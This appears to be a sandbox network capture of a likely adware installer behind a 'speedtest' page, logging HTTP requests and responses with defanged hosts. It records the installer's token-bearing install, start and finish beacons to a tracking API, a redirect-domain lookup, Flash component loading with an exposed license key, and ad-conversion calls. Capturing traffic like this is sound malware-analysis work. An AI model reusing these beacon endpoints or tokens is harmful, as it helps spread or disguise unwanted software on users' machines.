Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: VVV.google.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
Location: hXXp://VVV.google.com.ua/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956&ipr=y<br>
Cache-Control: private, max-age=43200<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Expires: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Server: adclick_server<br>
Content-Length: 700<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><<< skipped >>></font><br><br>
<font color="red">GET /css?family=Open Sans:400,600,700,800 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: fonts.googleapis.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Type: text/css<br>
Timing-Allow-Origin: *<br>
Expires: Sat, 09 Aug 2014 02:05:05 GMT<br>
Date: Sat, 09 Aug 2014 02:05:05 GMT<br>
Cache-Control: private, max-age=86400<br>
Content-Encoding: gzip<br>
Content-Length: 262<br>
X-Content-Type-Options: nosniff<br>
X-Frame-Options: SAMEORIGIN<br>
X-XSS-Protection: 1; mode=block<br>
Server: GSE<br>
Alternate-Protocol: 80:quic<br></font><br><br>
<font color="red">POST /events HTTP/1.1<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Token: 1ac1acb5747d4b6db021a1ac3947003b<br>
X-Hash: d360c61977da6f671ee04b0f0db5d6753737a7ee<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Content-Length: 180<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
{"country":"","timestamp":"2014-08-09 5:04:50","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":"697294400","component_id":"696","cid":"4751","action":"install","error_type":""}</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:01 GMT<br>
Content-Type: application/json<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br>
Access-Control-Allow-Origin: *<br><pre>27..{"flash":{},"error":false,"status":200}..0..</pre></font><br><br><font color="red">POST /events HTTP/1.1<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Token: 1ac1acb5747d4b6db021a1ac3947003b<br>
X-Hash: 46496a7ea9094c0db7f1e6beb71b3a45e4bdedcf<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Content-Length: 176<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
{"country":"","timestamp":"2014-08-09 5:04:51","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":"931079049","component_id":"","cid":"4751","action":"finish","error_type":""}</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:02 GMT<br>
Content-Type: application/json<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br>
Access-Control-Allow-Origin: *<br><pre>27..{"flash":{},"error":false,"status":200}..0..</pre></font><br><br>
<font color="red">GET /pagead/viewthroughconversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: googleads.g.doubleclick.net<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
P3P: policyref="hXXp://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, must-revalidate<br>
Location: hXXp://VVV.google.com/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br>
Set-Cookie: test_cookie=CheckForPermission; expires=Sat, 09-Aug-2014 02:20:12 GMT; path=/; domain=.doubleclick.net<br><<< skipped >>></font><br><br>
<font color="red">GET /speedtest/?cid=4751 HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:03 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.17<br>
Set-Cookie: cid=4751; expires=Mon, 08-Sep-2014 02:05:03 GMT; path=/; domain=.performersoft.com<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br><<< skipped >>></font><br><br><font color="red">GET /speedtest/media/style.css HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:05 GMT<br>
Content-Type: text/css<br>
Last-Modified: Tue, 11 Mar 2014 08:22:46 GMT<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
Expires: Sat, 09 Aug 2014 03:05:05 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br><<< skipped >>></font><br><br><font color="red">GET /speedtest/media/bg.jpg HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:05 GMT<br>
Content-Type: image/jpeg<br>
Content-Length: 8136<br>
Last-Modified: Thu, 07 Mar 2013 07:56:50 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "51384842-1fc8"<br>
Expires: Sat, 09 Aug 2014 03:05:05 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br><font color="red">GET /speedtest/media/speed-analisys.png HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: image/png<br>
Content-Length: 23992<br>
Last-Modified: Wed, 09 Oct 2013 06:56:42 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "5254fe2a-5db8"<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br><font color="red">GET /component/js/swfobject.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: application/x-javascript<br>
Last-Modified: Sun, 30 Mar 2014 11:59:34 GMT<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br><<< skipped >>></font><br><br><font color="red">GET /component/img/banner-pcp.png HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: image/png<br>
Content-Length: 67806<br>
Last-Modified: Sun, 30 Mar 2014 11:59:36 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "53380728-108de"<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br><font color="red">GET /component/img/banner-sa.png HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 404 Not Found<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: text/html<br>
Content-Length: 564<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br><pre><html>..<head><title>404 Not Found</title><<br>/head>..<body bgcolor="white">..<center><h1>404 N<br>ot Found</h1></center>..<hr><center>nginx</<br>center>..</body>..</html>..<!-- a padding to disable<br> MSIE and Chrome friendly error page -->..<!-- a padding to disa<br>ble MSIE and Chrome friendly error page -->..<!-- a padding to d<br>isable MSIE and Chrome friendly error page -->..<!-- a padding t<br>o disable MSIE and Chrome friendly error page -->..<!-- a paddin<br>g to disable MSIE and Chrome friendly error page -->..<!-- a pad<br>ding to disable MSIE and Chrome friendly error page -->..</font>...<br>.</pre></font><br><br><font color="red">GET /component/img/whitebg.png HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: image/png<br>
Content-Length: 979<br>
Last-Modified: Sun, 30 Mar 2014 11:59:36 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "53380728-3d3"<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br></font><br><br><font color="red">GET /speedtest/media/footer.jpg HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Type: image/jpeg<br>
Content-Length: 3691<br>
Last-Modified: Thu, 07 Mar 2013 07:57:04 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "51384850-e6b"<br>
Expires: Sat, 09 Aug 2014 03:05:08 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br>
<font color="red">GET /component/logics.swf?nocache=9082 HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-US<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
x-flash-version: 11,6,602,168<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; __utma=125033355.476553240.1407549896.1407549901.1407549901.1; __utmb=125033355.1.10.1407549901; __utmc=125033355; __utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: application/x-shockwave-flash<br>
Content-Length: 37670<br>
Last-Modified: Tue, 10 Jun 2014 06:34:05 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "5396a6dd-9326"<br>
Expires: Sat, 09 Aug 2014 03:05:12 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br><font color="red">GET /component/config.xml HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-US<br>
Referer: hXXp://VVV.performersoft.com/component/logics.swf?nocache=9082<br>
x-flash-version: 11,6,602,168<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; __utma=125033355.476553240.1407549896.1407549901.1407549901.1; __utmb=125033355.1.10.1407549901; __utmc=125033355; __utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/xml<br>
Content-Length: 223<br>
Last-Modified: Sun, 30 Mar 2014 12:24:17 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "53380cf1-df"<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre><?xml version="1.0" encoding="UTF-8"?><br><main><br>    <license><br>        <customer>ibario</customer><br>        <domain>VVV.performersoft.com</domain><br>        <key>914b0bde6ff65c7fc05486bdcca65506</key><br>    </license><br></main></pre></font><br><br><font color="red">POST /component/gateway.php HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-US<br>
Referer: hXXp://VVV.performersoft.com/component/logics.swf?nocache=9082<br>
x-flash-version: 11,6,602,168<br>
Content-Type: application/x-www-form-urlencoded<br>
Content-Length: 44<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; __utma=125033355.476553240.1407549896.1407549901.1407549901.1; __utmb=125033355.1.10.1407549901; __utmc=125033355; __utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); norjs=1<br>
<br>
domain=www.performersoft.com&action=init</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.17<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br></font><br><br><font color="red">GET /component/graphics.swf?nocache=413332.6606824994 HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-US<br>
Referer: hXXp://VVV.performersoft.com/component/logics.swf?nocache=9082<br>
x-flash-version: 11,6,602,168<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; __utma=125033355.476553240.1407549896.1407549901.1407549901.1; __utmb=125033355.1.10.1407549901; __utmc=125033355; __utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:13 GMT<br>
Content-Type: application/x-shockwave-flash<br>
Content-Length: 46752<br>
Last-Modified: Sun, 30 Mar 2014 11:59:36 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "53380728-b6a0"<br>
Expires: Sat, 09 Aug 2014 03:05:13 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br>
<font color="red">GET /utils/dns HTTP/1.1<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:04:36 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br><pre>17..hXXp://VVV.appregis.com..0..HTTP/1.1 200 OK..Server: nginx..Date: <br>Sat, 09 Aug 2014 02:04:36 GMT..Content-Type: text/html..Transfer-Encod<br>ing: chunked..Connection: keep-alive..Keep-Alive: timeout=2..Vary: Acc<br>ept-Encoding..X-Powered-By: PHP/5.4.13..17..hXXp://VVV.appregis.com..0<br>..</font>....</pre></font><br><br><font color="red">POST /events HTTP/1.1<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Token: 1ac1acb5747d4b6db021a1ac3947003b<br>
X-Hash: abdee05783fe5b23e095935a51a00b6bd959f7d7<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Content-Length: 176<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
{"country":"","timestamp":"2014-08-09 5:04:25","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":"1599991063","component_id":"","cid":"4751","action":"start","error_type":""}</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:04:37 GMT<br>
Content-Type: application/json<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br>
Access-Control-Allow-Origin: *<br><pre>27..{"flash":{},"error":false,"status":200}..0..HTTP/1.1 200 OK..Serve<br>r: nginx..Date: Sat, 09 Aug 2014 02:04:37 GMT..Content-Type: applicati<br>on/json..Transfer-Encoding: chunked..Connection: keep-alive..Keep-Aliv<br>e: timeout=2..Vary: Accept-Encoding..X-Powered-By: PHP/5.4.13..Access-<br>Control-Allow-Origin: *..27..{"flash":{},"error":false,"status":200}..<br>0..</pre></font><br><br>
<font color="red">GET /ajax/libs/jquery/1.9.1/jquery.min.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ajax.googleapis.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Type: text/javascript; charset=UTF-8<br>
Last-Modified: Fri, 08 Feb 2013 15:35:10 GMT<br>
Date: Fri, 08 Aug 2014 05:34:26 GMT<br>
Expires: Sat, 08 Aug 2015 05:34:26 GMT<br>
Access-Control-Allow-Origin: *<br>
Timing-Allow-Origin: *<br>
X-Content-Type-Options: nosniff<br>
Server: sffe<br>
Content-Length: 32819<br>
X-XSS-Protection: 1; mode=block<br>
Cache-Control: public, max-age=31536000<br>
Age: 73840<br>
Alternate-Protocol: 80:quic<br><<< skipped >>></font><br><br>
<font color="red">GET /ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896&ipr=y HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: VVV.google.com.ua<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, no-store, must-revalidate<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: adclick_server<br>
Content-Length: 76<br>
